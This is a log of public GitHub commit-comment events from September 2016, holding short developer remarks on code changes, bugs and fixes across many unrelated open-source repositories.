{"id":"4525488174","type":"CommitCommentEvent","actor":{"login":"glennehrlich"},"repo":{"name":"belak/base16-emacs"},"payload":{"comment":{"id":18923169,"position":null,"line":null,"path":null,"commit_id":"d97474f6188700556ac4e121b7ea8887e24a8c0b","created_at":"2016-09-07T05:19:48Z","updated_at":"2016-09-07T05:19:48Z","body":"Tested the new version from melpa, works great! Thanks for responding to this so quickly.\n\n\n> On Sep 6, 2016, at 9:15 PM, Kaleb Elwert <notifications@github.com> wrote:\n> \n> Fix ansi colors\n> \n> Thanks to @glennehrlich for the fix.\n> \n> Fixes #25\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/belak/base16-emacs/commit/d97474f6188700556ac4e121b7ea8887e24a8c0b\n\n"}},"created_at":"2016-09-07T05:19:48Z"}
{"id":"4525488437","type":"CommitCommentEvent","actor":{"login":"cesarmtz93"},"repo":{"name":"gontovnik/DGRunkeeperSwitch"},"payload":{"comment":{"id":18923170,"position":null,"line":null,"path":null,"commit_id":"dbe8635d070c60f51a810fbfc04187e7bb8d53e5","created_at":"2016-09-07T05:19:57Z","updated_at":"2016-09-07T05:19:57Z","body":"is this on the last version on the cocoa pod file?"}},"created_at":"2016-09-07T05:19:57Z"}
{"id":"4525489651","type":"CommitCommentEvent","actor":{"login":"Muchachito"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18923172,"position":null,"line":null,"path":null,"commit_id":"efa93893a23358c044c434dd7b2a7637c2dc802c","created_at":"2016-09-07T05:20:25Z","updated_at":"2016-09-07T05:20:25Z","body":"@Jamflux no fui yo. Mi editor de texto se encargo de hacerlo por mi sin preguntar."}},"created_at":"2016-09-07T05:20:25Z"}
{"id":"4525489900","type":"CommitCommentEvent","actor":{"login":"daveypir"},"repo":{"name":"daveypir/Hello-World"},"payload":{"comment":{"id":18923173,"position":null,"line":null,"path":null,"commit_id":"38b01e9e7d441014547bbdd482f6a1b4d104175f","created_at":"2016-09-07T05:20:31Z","updated_at":"2016-09-07T05:20:31Z","body":"Add more notes"}},"created_at":"2016-09-07T05:20:31Z"}
{"id":"4525490337","type":"CommitCommentEvent","actor":{"login":"StephanMa"},"repo":{"name":"icaruseu/mom-ca"},"payload":{"comment":{"id":18923175,"position":null,"line":null,"path":null,"commit_id":"6e681559448bdf70215c5cd5efd0ab6b2080c48c","created_at":"2016-09-07T05:20:42Z","updated_at":"2016-09-07T05:20:42Z","body":"I don't think that \"overloaded\" is a wrong word here because it is a technical term in programming. But I think it wouldn't be such a difference anyway."}},"created_at":"2016-09-07T05:20:42Z"}
{"id":"4525491751","type":"CommitCommentEvent","actor":{"login":"j27mayuresh"},"repo":{"name":"j27mayuresh/hello-World"},"payload":{"comment":{"id":18923177,"position":null,"line":null,"path":null,"commit_id":"e9fb75e97b85788aafddec9960d96969d2c1c789","created_at":"2016-09-07T05:21:18Z","updated_at":"2016-09-07T05:21:18Z","body":"Colone of Hello-Worldw"}},"created_at":"2016-09-07T05:21:18Z"}
{"id":"4525492363","type":"CommitCommentEvent","actor":{"login":"gavinsimpson"},"repo":{"name":"vegandevs/vegan"},"payload":{"comment":{"id":18923180,"position":null,"line":null,"path":null,"commit_id":"b72d3dd0e878e286eabb4b047a844195abf08067","created_at":"2016-09-07T05:21:35Z","updated_at":"2016-09-07T05:21:35Z","body":"@jarioksa could you outline the thinking behind this change? I have similar code in *analogue* so should change that accordingly but I'm not sure what this change does."}},"created_at":"2016-09-07T05:21:35Z"}
{"id":"4525493139","type":"CommitCommentEvent","actor":{"login":"akx"},"repo":{"name":"golddranks/bawwaw"},"payload":{"comment":{"id":18923181,"position":1,"line":1,"path":"bawwaw/pom.xml","commit_id":"76efb0f02380e1115277ae13b2d9fbbb2db5d0ec","created_at":"2016-09-07T05:21:55Z","updated_at":"2016-09-07T05:21:55Z","body":"FILE IS CALLED POM.XML BUT CONTAINS NOT A SINGLE POMERANIAN WHAT IS THIS"}},"created_at":"2016-09-07T05:21:55Z"}
{"id":"4525497631","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18923196,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T05:23:55Z","updated_at":"2016-09-07T05:23:55Z","body":"The combo patch is doing very well at LTC..."}},"created_at":"2016-09-07T05:23:55Z"}
{"id":"4525499364","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18923197,"position":null,"line":null,"path":null,"commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-07T05:24:39Z","updated_at":"2016-09-07T05:24:39Z","body":"Yes, you're right.\r\nI missed that in if (! Started content) without blank lines will be continue."}},"created_at":"2016-09-07T05:24:39Z"}
{"id":"4525500294","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18923199,"position":null,"line":null,"path":null,"commit_id":"f78f51e2a7cbbbfc464e4761b0d70505dd4edb92","created_at":"2016-09-07T05:25:04Z","updated_at":"2016-09-07T05:25:04Z","body":"Yes, @floam, you're correct that I was mistaken in my initial assessment of the problem. Nonetheless, it is extremely stupid for BSD seq to issue an error in the `seq 0 -1 1` case (and all similar cases) and that behavior deserves a Picard face-palm. The user explicitly asked for decrement behavior. It should not matter that the starting value is less than the terminating value. I would expect you to appreciate this more than almost anyone else who stumbles across this behavior."}},"created_at":"2016-09-07T05:25:04Z"}
{"id":"4525502521","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"sten22/cperl"},"payload":{"comment":{"id":18923202,"position":6,"line":331,"path":"installperl","commit_id":"44a6837a9ea826324e947f46f4341ac95ed9f341","created_at":"2016-09-07T05:25:55Z","updated_at":"2016-09-07T05:25:55Z","body":"cperl.exe only exists on win32, others keep perl. \r\nThere needs to be a win32 ? :"}},"created_at":"2016-09-07T05:25:55Z"}
{"id":"4525508034","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923206,"position":91,"line":91,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:28:04Z","updated_at":"2016-09-07T05:28:04Z","body":"are you sure the proper config file is read?"}},"created_at":"2016-09-07T05:28:04Z"}
{"id":"4525515116","type":"CommitCommentEvent","actor":{"login":"ruslo"},"repo":{"name":"hunter-packages/libssh2"},"payload":{"comment":{"id":18923218,"position":6,"line":69,"path":"src/CMakeLists.txt","commit_id":"8bbf2d74516273584db9d72c76ba31da86aef700","created_at":"2016-09-07T05:30:52Z","updated_at":"2016-09-07T05:30:52Z","body":"For what reason? OpenSSL::Crypto is available in CMake without Hunter too: https://cmake.org/cmake/help/latest/module/FindOpenSSL.html You want support of older versions of CMake?"}},"created_at":"2016-09-07T05:30:52Z"}
{"id":"4525515966","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923219,"position":127,"line":127,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:31:13Z","updated_at":"2016-09-07T05:31:13Z","body":"static import ImmutableTpchTablesRequirements"}},"created_at":"2016-09-07T05:31:13Z"}
{"id":"4525516688","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18923220,"position":null,"line":null,"path":null,"commit_id":"23ababdcd57079182172b1c5467fcd6bb0f303d3","created_at":"2016-09-07T05:31:29Z","updated_at":"2016-09-07T05:31:29Z","body":"You don't need Internet to commit @reduz, this is git :p"}},"created_at":"2016-09-07T05:31:29Z"}
{"id":"4525516973","type":"CommitCommentEvent","actor":{"login":"NogginBops"},"repo":{"name":"NogginBops/SKON.NET"},"payload":{"comment":{"id":18923221,"position":5,"line":9,"path":"SKON.NET/SKON.NET/SKON.NET.csproj","commit_id":"b03e3e6a6d718709ce43ab9aab856b66beb1ecf9","created_at":"2016-09-07T05:31:37Z","updated_at":"2016-09-07T05:31:37Z","body":"Yeah, um thats just me being tired and stupid. Going to switch back."}},"created_at":"2016-09-07T05:31:37Z"}
{"id":"4525517227","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923222,"position":65,"line":65,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:31:42Z","updated_at":"2016-09-07T05:31:42Z","body":"rename it to NATION_SELECT_ALL_QUERY?"}},"created_at":"2016-09-07T05:31:42Z"}
{"id":"4525519601","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18923225,"position":null,"line":null,"path":null,"commit_id":"96cb98b1cf995cfbfd70f9216b3d9eba0b40a54b","created_at":"2016-09-07T05:32:37Z","updated_at":"2016-09-07T05:32:37Z","body":"Related to: backdrop/backdrop-issues#2001 "}},"created_at":"2016-09-07T05:32:37Z"}
{"id":"4525519788","type":"CommitCommentEvent","actor":{"login":"evernife"},"repo":{"name":"KaiKikuchi/QuickShop"},"payload":{"comment":{"id":18923226,"position":null,"line":null,"path":null,"commit_id":"71b296d6f1c95987c475016e030bebaa56b7af4f","created_at":"2016-09-07T05:32:41Z","updated_at":"2016-09-07T05:32:41Z","body":"The name works only for vanilla itens or for moded too?\r\n\r\n> exemple: `ThermalExpansion:Machine:3`"}},"created_at":"2016-09-07T05:32:41Z"}
{"id":"4525520134","type":"CommitCommentEvent","actor":{"login":"RedgooseDev"},"repo":{"name":"RedgooseDev/goose"},"payload":{"comment":{"id":18923229,"position":null,"line":null,"path":null,"commit_id":"67b45432b3ff3a47faebd7ca2aac4b67133ae667","created_at":"2016-09-07T05:32:50Z","updated_at":"2016-09-07T05:32:50Z","body":"#148 이슈 표본 작업완료"}},"created_at":"2016-09-07T05:32:50Z"}
{"id":"4525521026","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18923230,"position":null,"line":null,"path":null,"commit_id":"e91c85e84d9789975c4be597c79b37a7750448ff","created_at":"2016-09-07T05:33:10Z","updated_at":"2016-09-07T05:33:10Z","body":"This commit rounds out some tests for `word64` and `word128`. I'm not aware of any hidden failures."}},"created_at":"2016-09-07T05:33:10Z"}
{"id":"4525522042","type":"CommitCommentEvent","actor":{"login":"PonteIneptique"},"repo":{"name":"sosol/sosol"},"payload":{"comment":{"id":18923231,"position":null,"line":null,"path":null,"commit_id":"b0d015b0d5958c31f807badd0b4f6bb298624c46","created_at":"2016-09-07T05:33:32Z","updated_at":"2016-09-07T05:33:32Z","body":"![giphyhouse](https://cloud.githubusercontent.com/assets/1929830/18300878/5c6d3be4-74cd-11e6-96b1-dc0d15b4af59.gif)\r\n"}},"created_at":"2016-09-07T05:33:32Z"}
{"id":"4525523085","type":"CommitCommentEvent","actor":{"login":"RedgooseDev"},"repo":{"name":"RedgooseDev/goose"},"payload":{"comment":{"id":18923233,"position":null,"line":null,"path":null,"commit_id":"8928d9d06006a76e6461328edd30144455fecda0","created_at":"2016-09-07T05:33:56Z","updated_at":"2016-09-07T05:33:56Z","body":"#148 이슈 표본 작업완료"}},"created_at":"2016-09-07T05:33:56Z"}
{"id":"4525523309","type":"CommitCommentEvent","actor":{"login":"heiko-braun"},"repo":{"name":"wildfly-swarm/wildfly-swarm"},"payload":{"comment":{"id":18923234,"position":null,"line":null,"path":null,"commit_id":"fddcc828826aa000e9eaf18033ea54c34c71eb3b","created_at":"2016-09-07T05:34:01Z","updated_at":"2016-09-07T05:34:01Z","body":"Thanks bob, thats useful"}},"created_at":"2016-09-07T05:34:01Z"}
{"id":"4525523648","type":"CommitCommentEvent","actor":{"login":"vishy16"},"repo":{"name":"dark/gerrit-owners"},"payload":{"comment":{"id":18923235,"position":null,"line":null,"path":null,"commit_id":"6eb35336fe019d2d4997ca44dffb22475893ed3c","created_at":"2016-09-07T05:34:11Z","updated_at":"2016-09-07T05:34:11Z","body":"Hi Marco,\r\n\r\nThis is change will not give compile time error with 2.12.3 version but introduces bug.\r\nI upgraded to Gerrit 2.12.3 recently it shows Owner-Approval needed for all the changes.\r\nEven if there is no OWNERS file in a directory, OA label is shown in red color UI and submit button is invisible. Also OA is required from more than one owner.\r\n\r\ncan you give some pointers.\r\n\r\nThanks in advance.\r\n"}},"created_at":"2016-09-07T05:34:11Z"}
{"id":"4525525530","type":"CommitCommentEvent","actor":{"login":"RedgooseDev"},"repo":{"name":"RedgooseDev/goose"},"payload":{"comment":{"id":18923238,"position":null,"line":null,"path":null,"commit_id":"67b45432b3ff3a47faebd7ca2aac4b67133ae667","created_at":"2016-09-07T05:34:42Z","updated_at":"2016-09-07T05:34:42Z","body":"#148 이슈 표본 작업완료"}},"created_at":"2016-09-07T05:34:42Z"}
{"id":"4525525826","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18923241,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-07T05:34:48Z","updated_at":"2016-09-07T05:34:48Z","body":"Can you prove your claim? Or do you mind if I try to prevent that with a comment?"}},"created_at":"2016-09-07T05:34:48Z"}
{"id":"4525527789","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18923247,"position":33,"line":50,"path":"Formula/caf.rb","commit_id":"7b6c4fd194bef0cf6ebf0e2ccc6e0bbe634147d0","created_at":"2016-09-07T05:35:31Z","updated_at":"2016-09-07T05:35:31Z","body":"@dpo this was just for you :)"}},"created_at":"2016-09-07T05:35:31Z"}
{"id":"4525529214","type":"CommitCommentEvent","actor":{"login":"lidimayra"},"repo":{"name":"lidimayra/chess_clock"},"payload":{"comment":{"id":18923251,"position":2,"line":2,"path":"chess_clock/chess_clock.ino","commit_id":"eb5e6ee36772c98a42ea2c7dbb4c35387a3066de","created_at":"2016-09-07T05:36:03Z","updated_at":"2016-09-07T05:36:03Z","body":"Esta alteração não fez sentido! Desfaça!"}},"created_at":"2016-09-07T05:36:03Z"}
{"id":"4525530124","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923252,"position":210,"line":210,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:36:23Z","updated_at":"2016-09-07T05:36:23Z","body":"use http://testng.org/javadocs/org/testng/Assert.html#fail-- instead"}},"created_at":"2016-09-07T05:36:23Z"}
{"id":"4525530451","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18923253,"position":136,"line":1275,"path":"scene/gui/line_edit.cpp","commit_id":"405f6af79c32c575768f53661127cfd6aa4230f4","created_at":"2016-09-07T05:36:29Z","updated_at":"2016-09-07T05:36:29Z","body":"There's a typo here, it should be `\"length\"` as argument."}},"created_at":"2016-09-07T05:36:29Z"}
{"id":"4525530802","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923254,"position":227,"line":227,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:36:39Z","updated_at":"2016-09-07T05:36:39Z","body":"ditto"}},"created_at":"2016-09-07T05:36:39Z"}
{"id":"4525531293","type":"CommitCommentEvent","actor":{"login":"lriki"},"repo":{"name":"b1012011/kenshu-201609"},"payload":{"comment":{"id":18923256,"position":null,"line":null,"path":null,"commit_id":"4e4470e443726dff475237d59cf946f619896eb0","created_at":"2016-09-07T05:36:50Z","updated_at":"2016-09-07T05:36:50Z","body":"オッケーです:+1:"}},"created_at":"2016-09-07T05:36:50Z"}
{"id":"4525531870","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923259,"position":246,"line":246,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:37:03Z","updated_at":"2016-09-07T05:37:03Z","body":"ditto"}},"created_at":"2016-09-07T05:37:03Z"}
{"id":"4525539251","type":"CommitCommentEvent","actor":{"login":"khanqadir92"},"repo":{"name":"khanqadir92/hello-world"},"payload":{"comment":{"id":18923271,"position":null,"line":null,"path":null,"commit_id":"14ec80f2f181f467bd5a083d841982e971f14d6b","created_at":"2016-09-07T05:39:53Z","updated_at":"2016-09-07T05:39:53Z","body":"Leave a comment\r\nI am new to this....... \r\n"}},"created_at":"2016-09-07T05:39:53Z"}
{"id":"4525546640","type":"CommitCommentEvent","actor":{"login":"smurugap"},"repo":{"name":"smurugap/tempest"},"payload":{"comment":{"id":18923291,"position":8,"line":112,"path":"run_contrail_tempest.sh","commit_id":"df87d58207e71ec15a8380eb306fae52fed7ece0","created_at":"2016-09-07T05:42:39Z","updated_at":"2016-09-07T05:42:39Z","body":"Vinoth,\r\nWhy do we need sources.list?\r\nMoreover it should be a relative path and not absolute."}},"created_at":"2016-09-07T05:42:39Z"}
{"id":"4525548373","type":"CommitCommentEvent","actor":{"login":"jamesgol"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18923292,"position":8,"line":13,"path":"assets/js/builder/main.js","commit_id":"2a715ccaf7252a2096e0ec0d9c9680c9c6dc2d90","created_at":"2016-09-07T05:43:18Z","updated_at":"2016-09-07T05:43:18Z","body":"I'm getting a JS error that is keeping the builder from loading on this line on a fresh install of the plugin\r\n```\r\nUncaught TypeError: e is not a function\r\n```\r\n"}},"created_at":"2016-09-07T05:43:18Z"}
{"id":"4525551078","type":"CommitCommentEvent","actor":{"login":"RedgooseDev"},"repo":{"name":"RedgooseDev/goose"},"payload":{"comment":{"id":18923295,"position":null,"line":null,"path":null,"commit_id":"8928d9d06006a76e6461328edd30144455fecda0","created_at":"2016-09-07T05:44:24Z","updated_at":"2016-09-07T05:44:24Z","body":"#135 플러그인 교체로 표본은 작업완료."}},"created_at":"2016-09-07T05:44:24Z"}
{"id":"4525552173","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923298,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:44:48Z","updated_at":"2016-09-07T05:44:48Z","body":"is this configuration valid? Would anyone run LDAP test without Teradata JDBC Driver? Maybe throw an exception here?"}},"created_at":"2016-09-07T05:44:48Z"}
{"id":"4525554012","type":"CommitCommentEvent","actor":{"login":"t9md"},"repo":{"name":"t9md/atom-vim-mode-plus"},"payload":{"comment":{"id":18923306,"position":null,"line":null,"path":null,"commit_id":"5585f12a7fa19c9c590d884d10418472c557f272","created_at":"2016-09-07T05:45:30Z","updated_at":"2016-09-07T05:45:30Z","body":"> Why I need .paltform-darwin but in my environment I suddenly become not\r\nwork without this scope specificity, recent auto-update cause this??\r\n\r\nThis was my mistake, ignore above comment.\r\n"}},"created_at":"2016-09-07T05:45:30Z"}
{"id":"4525554335","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923307,"position":264,"line":264,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:45:37Z","updated_at":"2016-09-07T05:45:37Z","body":"rename to `getLdapConnection`?"}},"created_at":"2016-09-07T05:45:37Z"}
{"id":"4525555608","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18923309,"position":null,"line":null,"path":null,"commit_id":"ed1d193dd05c8d3e290e4638be358d98660a9e79","created_at":"2016-09-07T05:46:08Z","updated_at":"2016-09-07T05:46:08Z","body":"Not needed at all. Simply remove the gone **aiptek**: https://github.com/manjaro/manjaro-tools-iso-profiles/commit/d4b0f37d32e34204ed4109e33dafc7301fb6089d"}},"created_at":"2016-09-07T05:46:08Z"}
{"id":"4525555998","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923312,"position":254,"line":254,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:46:16Z","updated_at":"2016-09-07T05:46:16Z","body":"executeLdapQuery?"}},"created_at":"2016-09-07T05:46:16Z"}
{"id":"4525556148","type":"CommitCommentEvent","actor":{"login":"zardus"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18923315,"position":null,"line":null,"path":null,"commit_id":"37176a385e62a99c17dd6f83c3b5459d5bee7b71","created_at":"2016-09-07T05:46:20Z","updated_at":"2016-09-07T05:46:20Z","body":"Can you try running `make clean` in that directory and see what it says?"}},"created_at":"2016-09-07T05:46:20Z"}
{"id":"4525556395","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18923316,"position":242,"line":242,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T05:46:26Z","updated_at":"2016-09-07T05:46:26Z","body":"expectLdapQueryToFail?"}},"created_at":"2016-09-07T05:46:26Z"}
{"id":"4525556521","type":"CommitCommentEvent","actor":{"login":"zaemyung"},"repo":{"name":"hyeon0145/namu-wiki-extractor"},"payload":{"comment":{"id":18923317,"position":null,"line":null,"path":null,"commit_id":"30f18162e2a493b6fcbcc2ecf1422b0dbf65010a","created_at":"2016-09-07T05:46:28Z","updated_at":"2016-09-07T05:46:28Z","body":"very good!"}},"created_at":"2016-09-07T05:46:28Z"}
{"id":"4525560861","type":"CommitCommentEvent","actor":{"login":"chomado"},"repo":{"name":"hask-bird/xamarin-dev-doc"},"payload":{"comment":{"id":18923324,"position":null,"line":null,"path":null,"commit_id":"c5f3474db9be3abb0359d3d26106f0d1a9e74594","created_at":"2016-09-07T05:48:09Z","updated_at":"2016-09-07T05:48:09Z","body":"なんか GitHub で変な操作したかもしれなくて、変なプルリクエスト送っているかもしれないです、その時はスルーでお願いします！"}},"created_at":"2016-09-07T05:48:09Z"}
{"id":"4525561692","type":"CommitCommentEvent","actor":{"login":"nelsonRoberts1968"},"repo":{"name":"nelsonRoberts1968/ScannerApp"},"payload":{"comment":{"id":18923329,"position":81,"line":81,"path":"app/src/main/java/com/example/nmmbando/sd_scanner/DisplayStatisticsActivity.java","commit_id":"e287e584139ad6c8b6d01a269842a015964b995f","created_at":"2016-09-07T05:48:24Z","updated_at":"2016-09-07T05:48:24Z","body":"This is an updated file\r\n"}},"created_at":"2016-09-07T05:48:24Z"}
{"id":"4525568716","type":"CommitCommentEvent","actor":{"login":"liuzhangliang"},"repo":{"name":"liuzhangliang/mygit_test"},"payload":{"comment":{"id":18923335,"position":2,"line":2,"path":"README.md","commit_id":"a4a58a0189f8775587799b29ef248da85feb5eb9","created_at":"2016-09-07T05:50:57Z","updated_at":"2016-09-07T05:50:57Z","body":"git init"}},"created_at":"2016-09-07T05:50:57Z"}
{"id":"4525575595","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18923348,"position":null,"line":null,"path":null,"commit_id":"bd60d828c5fc9cb066e5f647c87ecd6f70cb63a5","created_at":"2016-09-07T05:53:26Z","updated_at":"2016-09-07T05:53:26Z","body":"@davidaurelio But isn't it easier for developers to adopt `fbjs/lib` and `react/lib` modules when they can be imported by name? For example, I use `fs/lib/emptyFunction` but I'd rather import it with `emptyFunction`."}},"created_at":"2016-09-07T05:53:26Z"}
{"id":"4525575702","type":"CommitCommentEvent","actor":{"login":"taggaddaaaa"},"repo":{"name":"taggaddaaaa/Playerz-io"},"payload":{"comment":{"id":18923350,"position":null,"line":null,"path":null,"commit_id":"9d26975052802b74486a2f8a1b4b491bbf1a653f","created_at":"2016-09-07T05:53:30Z","updated_at":"2016-09-07T05:53:30Z","body":"doesn't work"}},"created_at":"2016-09-07T05:53:30Z"}
{"id":"4525582284","type":"CommitCommentEvent","actor":{"login":"tcc5936"},"repo":{"name":"tcc5936/docaso"},"payload":{"comment":{"id":18923354,"position":null,"line":null,"path":null,"commit_id":"c95a93bf916ec27bc929cc2a8253324fac163d2b","created_at":"2016-09-07T05:55:49Z","updated_at":"2016-09-07T05:55:49Z","body":"add classes section"}},"created_at":"2016-09-07T05:55:49Z"}
{"id":"4525586155","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18923363,"position":null,"line":null,"path":null,"commit_id":"f73afaeb7dd0c0eef4bb3b78462a1c231d3a6ada","created_at":"2016-09-07T05:57:05Z","updated_at":"2016-09-07T05:57:05Z","body":"`tmux lsc -F '#{session_name}'`"}},"created_at":"2016-09-07T05:57:05Z"}
{"id":"4525591343","type":"CommitCommentEvent","actor":{"login":"liangqi"},"repo":{"name":"bmbob/nrkopptak"},"payload":{"comment":{"id":18923366,"position":28,"line":454,"path":"bin/nrk-recorder","commit_id":"ef2acbbbffb76e02687fd28ee4ddca7803c774a6","created_at":"2016-09-07T05:58:59Z","updated_at":"2016-09-07T05:58:59Z","body":"What't the programid here?\r\n\r\nI tried \"bin/nrk-recorder dm https://tv.nrk.no/program/KOIF42007907/engelen\", get_content() return nothing for me."}},"created_at":"2016-09-07T05:58:59Z"}
{"id":"4525592681","type":"CommitCommentEvent","actor":{"login":"gideonn"},"repo":{"name":"gideonn/insta-Unfollow-Users"},"payload":{"comment":{"id":18923367,"position":null,"line":null,"path":null,"commit_id":"b706aaab2d67478feff0210ecfe738eca8fd5961","created_at":"2016-09-07T05:59:25Z","updated_at":"2016-09-07T05:59:25Z","body":"I'd recommend you to create an issue and track it there.\r\nPlease attach a screenshot of the error that you saw in the new issue. Also, make sure there are no unwanted spaces anywhere."}},"created_at":"2016-09-07T05:59:25Z"}
{"id":"4525607985","type":"CommitCommentEvent","actor":{"login":"winhowes"},"repo":{"name":"neiromendez/file-upload"},"payload":{"comment":{"id":18923431,"position":null,"line":null,"path":null,"commit_id":"e5b69fd389b7aef315baca3d4f632bc737264dbc","created_at":"2016-09-07T06:04:31Z","updated_at":"2016-09-07T06:04:31Z","body":"That's great! Would you mind making a PR? Thanks so much!"}},"created_at":"2016-09-07T06:04:31Z"}
{"id":"4525608542","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18923433,"position":null,"line":null,"path":null,"commit_id":"f78f51e2a7cbbbfc464e4761b0d70505dd4edb92","created_at":"2016-09-07T06:04:43Z","updated_at":"2016-09-07T06:04:43Z","body":"Sure do! It's Picard-worthy for sure."}},"created_at":"2016-09-07T06:04:43Z"}
{"id":"4525609603","type":"CommitCommentEvent","actor":{"login":"samsiraji"},"repo":{"name":"samsiraji/apack"},"payload":{"comment":{"id":18923436,"position":null,"line":null,"path":null,"commit_id":"813b458c70c8d241ff64bc62ecf280c83b87b004","created_at":"2016-09-07T06:05:07Z","updated_at":"2016-09-07T06:05:07Z","body":"first"}},"created_at":"2016-09-07T06:05:07Z"}
{"id":"4525610686","type":"CommitCommentEvent","actor":{"login":"Glease"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18923439,"position":30,"line":30,"path":"src/main/kotlin/me/exz/omniocular/OculusCordis.kt","commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T06:05:27Z","updated_at":"2016-09-07T06:05:27Z","body":"Isn't `fun process(tag : NBTTagCompound): Collecton<String>` good enough? Java programmers can use method referencing to create an instance of `Function<NBTTagCompound, Collection<String>>` if they like."}},"created_at":"2016-09-07T06:05:27Z"}
{"id":"4525611142","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18923440,"position":null,"line":null,"path":null,"commit_id":"f78f51e2a7cbbbfc464e4761b0d70505dd4edb92","created_at":"2016-09-07T06:05:36Z","updated_at":"2016-09-07T06:05:36Z","body":"I said MAKE IT SO!"}},"created_at":"2016-09-07T06:05:36Z"}
{"id":"4525612493","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"IOsonoTAN/koa-better-body"},"payload":{"comment":{"id":18923445,"position":4,"line":166,"path":"utils.js","commit_id":"9efd3a8928ba60930017eacb0f85425500d65190","created_at":"2016-09-07T06:06:05Z","updated_at":"2016-09-07T06:06:05Z","body":"I'm only agree that there's something wrong in these three lines. But the changed tests above are wrong for me."}},"created_at":"2016-09-07T06:06:05Z"}
